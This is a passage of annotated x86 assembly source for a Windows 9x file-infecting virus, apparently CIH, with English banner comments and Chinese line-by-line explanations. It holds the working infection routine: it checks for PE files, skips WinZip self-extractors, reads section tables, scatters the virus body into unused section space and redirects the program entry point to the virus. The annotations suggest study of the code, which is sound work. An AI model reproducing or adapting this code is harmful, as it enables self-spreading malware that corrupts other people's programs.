mov eax, ebp ;功能號(hào) 
call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀文件到esi 

; *************************** 
; * Is PE !? * 
; *************************** 
; * Is the File * 
; * Already Infected !? * 
; *************************** 
; * WinZip Self-Extractor * 
; * doesn't Have Infected * 
; * Mark Because My Virus * 
; * doesn't Infect it. * 
; *************************** 

; cmp [esi], '\0PE\0' 
cmp dword ptr [esi], 00455000h ;判斷是否是PE文件(標(biāo)志"PE\0\0") 
jne CloseFile ;不是就關(guān)閉文件 

; ************************************* 
; * The File is ^o^ * 
; * PE(Portable Executable) indeed. * 
; ************************************* 
; * The File isn't also Infected. * 
; ************************************* 

; ************************************* 
; * Start to Infect the File * 
; ************************************* 
; * Registers Use Status Now : * 
; * * 
; * EAX = 04h * 
; * EBX = File Handle * 
; * ECX = 04h * 
; * EDX = 'PE\0\0' Signature of * 
; * ImageFileHeader Pointer's * 
; * Former Byte. * 
; * ESI = DataBuffer Address ==> @8 * 
; * EDI = IFSMgr_Ring0_FileIO Address * 
; * EBP = D600h ==> Read Data in File * 
; ************************************* 
; * Stack Dump : * 
; * * 
; * ESP => ------------------------- * 
; * | EFLAG(CF=0) | * 
; * ------------------------- * 
; * | FileNameBufferPointer | * 
; * ------------------------- * 
; * | EDI | * 
; * ------------------------- * 
; * | ESI | * 
; * ------------------------- * 
; * | EBP | * 
; * ------------------------- * 
; * | ESP | * 
; * ------------------------- * 
; * | EBX | * 
; * ------------------------- * 
; * | EDX | * 
; * ------------------------- * 
; * | ECX | * 
; * ------------------------- * 
; * | EAX | * 
; * ------------------------- * 
; * | Return Address | * 
; * ------------------------- * 
; ************************************* 

push ebx ; Save File Handle ;保存文件句柄 

push 00h ; Set VirusCodeSectionTableEndMark 

; *************************** 
; * Let's Set the * 
; * Virus' Infected Mark * 
; *************************** 

push 01h ; Size 
push edx ; Pointer of File ;edx指向PE文件頭偏移00h 
push edi ; Address of Buffer ;edi為IFSMgr_Ring0_FileIO的地址(原注釋有誤) 

; *************************** 
; * Save ESP Register * 
; *************************** 

mov dr1, esp 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Only First Set Size ) * 
; *************************** 

push eax ; Size 

; *************************** 
; * Let's Read * 
; * Image Header in File * 
; *************************** 

mov eax, ebp 
mov cl, SizeOfImageHeaderToRead ;要讀2個(gè)字節(jié)(WORD NumberOfSections) 
add edx, 07h ; Move EDX to NumberOfSections ;PE文件頭+07h為NumberOfSections(塊個(gè)數(shù)) 
call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀出NumberOfSections(塊個(gè)數(shù))到esi 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Set Pointer of File, * 
; * Address of Buffer ) * 
; *************************** 

lea eax, (AddressOfEntryPoint-@8)[edx] 
push eax ; Pointer of File 

lea eax, (NewAddressOfEntryPoint-@8)[esi] 
push eax ; Address of Buffer 

; *************************** 
; * Move EDX to the Start * 
; * of SectionTable in File * 
; *************************** 

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] 
lea edx, [eax+edx+12h] ;edx為SectionTable的偏移 

; *************************** 
; * Let's Get * 
; * Total Size of Sections * 
; *************************** 

mov al, SizeOfScetionTable ;每個(gè)塊表項(xiàng)(ScetionTable)的大小(字節(jié)) 

; I Assume NumberOfSections <= 0ffh 
mov cl, (NumberOfSections-@8)[esi] 

mul cl ;每個(gè)塊表項(xiàng)乘以塊個(gè)數(shù)=塊表大小 

; *************************** 
; * Let's Set Section Table * 
; *************************** 

; Move ESI to the Start of SectionTable 
lea esi, (StartOfSectionTable-@8)[esi] ;esi指向塊表首址(在病毒動(dòng)態(tài)數(shù)據(jù)區(qū)中) 

push eax ; Size ;塊表大小 
push edx ; Pointer of File ;edx為SectionTable的偏移 
push esi ; Address of Buffer ; 

; *************************** 
; * The Code Size of Merge * 
; * Virus Code Section and * 
; * Total Size of Virus * 
; * Code Section Table Must * 
; * be Small or Equal the * 
; * Unused Space Size of * 
; * Following Section Table * 
; *************************** 

inc ecx 
push ecx ; Save NumberOfSections+1 

shl ecx, 03h ;*8 
push ecx ; Save TotalSizeOfVirusCodeSectionTable ;預(yù)留病毒塊表空間 

add ecx, eax 
add ecx, edx ;ecx+文件的正文的偏移 

sub ecx, (SizeOfHeaders-@9)[esi] 
not ecx 
inc ecx ;求補(bǔ) 
;ecx為文件頭大小-正文的偏移=未用空間 
; Save My Virus First Section Code 
; Size of Following Section Table... 
; ( Not Include the Size of Virus Code Section Table ) 
push ecx 

xchg ecx, eax ; ECX = Size of Section Table ;ecx為塊表大小 

; Save Original Address of Entry Point 
mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址 
add eax, (ImageBase-@9)[esi] ;裝入基址 
mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存裝入后實(shí)際的入口地址 

cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空間和病毒第一塊大小比較
jl OnlySetInfectedMark ;小于就只設(shè)感染標(biāo)志

; *************************** 
; * Read All Section Tables * 
; *************************** 

mov eax, ebp ;讀的功能號(hào) 
call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀塊表到esi(@9處) 

; *************************** 
; * Full Modify the Bug : * 
; * WinZip Self-Extractor * 
; * Occurs Error... * 
; *************************** 
; * So When User Opens * 
; * WinZip Self-Extractor, * 
; * Virus Doesn't Infect it.* 
; *************************** 
; * First, Virus Gets the * 
; * PointerToRawData in the * 
; * Second Section Table, * 
; * Reads the Section Data, * 
; * and Tests the String of * 
; * 'WinZip(R)'...... * 
; *************************** 

xchg eax, ebp 

push 00000004h 
pop ecx ;讀4字節(jié) 

push edx 
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx為第二塊的偏移(.rdata) 

add edx, 12h ;加10h+2h(10h處為"WinZip....") 

call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀4字節(jié)到esi 

; cmp [esi], 'nZip' 
cmp dword ptr [esi], 'piZn' ;判斷是否是WinZip自解壓文件 
je NotSetInfectedMark ;是就不設(shè)置感染標(biāo)志 

pop edx ;edx指向塊表在文件中首址 

; *************************** 
; * Let's Set Total Virus * 
; * Code Section Table * 
; *************************** 

; EBX = My Virus First Section Code 
; Size of Following Section Table 
pop ebx ; 未用空間大小 
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl 
pop ecx ; ECX = NumberOfSections+1 

push edi ; Size 

add edx, ebp ; ebp為塊表大小 
push edx ; Pointer of File ;指向塊表后(第一塊) 

add ebp, esi ; ebp指向病毒數(shù)據(jù)區(qū)的塊表后(第一塊) 
push ebp ; Address of Buffer 

; *************************** 
; * Set the First Virus * 
; * Code Section Size in * 
; * VirusCodeSectionTable * 
; *************************** 

lea eax, [ebp+edi-04h] 
mov [eax], ebx ;設(shè)置病毒代碼第一塊的大小(未用空間大小)到病毒塊表 

; *************************** 
; * Let's Set My Virus * 
; * First Section Code * 
; *************************** 

push ebx ; Size ;病毒代碼第一塊的大小(未用空間大小) 

add edx, edi 
push edx ; Pointer of File ;指向塊表后(第一塊)+Size??=病毒正文(病毒開始處) 

lea edi, (MyVirusStart-@9)[esi] 
push edi ; Address of Buffer ;指向病毒開始處 

; *************************** 
; * Let's Modify the * 
; * AddressOfEntryPoint to * 
; * My Virus Entry Point * 
; *************************** 

mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文) 

; *************************** 
; * Setup Initial Data * 
; *************************** 

lea edx, [esi-SizeOfScetionTable] ;edx先減一項(xiàng)塊表長度,以配合下面的"助標(biāo)1"
mov ebp, offset VirusSize ;ebp為病毒長度 

jmp StartToWriteCodeToSections 

; *************************** 
; * Write Code to Sections * 
; *************************** 

LoopOfWriteCodeToSections: 
　　
add edx, SizeOfScetionTable ;助標(biāo)1: 
;指向下一塊表項(xiàng) 
mov ebx, (SizeOfRawData-@9)[edx] ;ebx為該塊表項(xiàng)的SizeOfRawData(塊大小) 
sub ebx, (VirtualSize-@9)[edx] ;減去VirtualSize=該塊未用空間 
jbe EndOfWriteCodeToSections 

push ebx ; Size 

sub eax, 08h 
mov [eax], ebx ;寫入病毒塊表 

mov ebx, (PointerToRawData-@9)[edx] ;ebx為塊的物理(實(shí)際)偏移? 
add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize 
push ebx ; Pointer of File ;ebx指向該塊未用空間的文件指針 

push edi ; Address of Buffer 

mov ebx, (VirtualSize-@9)[edx] 
add ebx, (VirtualAddress-@9)[edx] 
add ebx, (ImageBase-@9)[esi] ;ebx為該塊裝入后的實(shí)際地址 
mov [eax+4], ebx ;保存到病毒塊表中 

mov ebx, [eax] ;該塊未用空間大小 
add (VirtualSize-@9)[edx], ebx ;加到該塊表項(xiàng)的VirtualSize

; Section contains initialized data ==> 00000040h 
; Section can be Read. ==> 40000000h 
or (Characteristics-@9)[edx], 40000040h ;改該塊表項(xiàng)的塊屬性(改為可讀,并包含初始化數(shù)據(jù)) 

StartToWriteCodeToSections: 

sub ebp, ebx ;病毒大小-病毒塊大小 
jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完畢)就設(shè)置病毒塊表結(jié)束符

add edi, ebx ; Move Address of Buffer ;指向病毒下一塊 

EndOfWriteCodeToSections: 

loop LoopOfWriteCodeToSections 

; *************************** 
; * Only Set Infected Mark * 
; *************************** 

OnlySetInfectedMark: 
mov esp, dr1 ;只設(shè)置感染標(biāo)志 

jmp WriteVirusCodeToFile ;跳到寫病毒到要傳染的文件的程序 

; *************************** 
;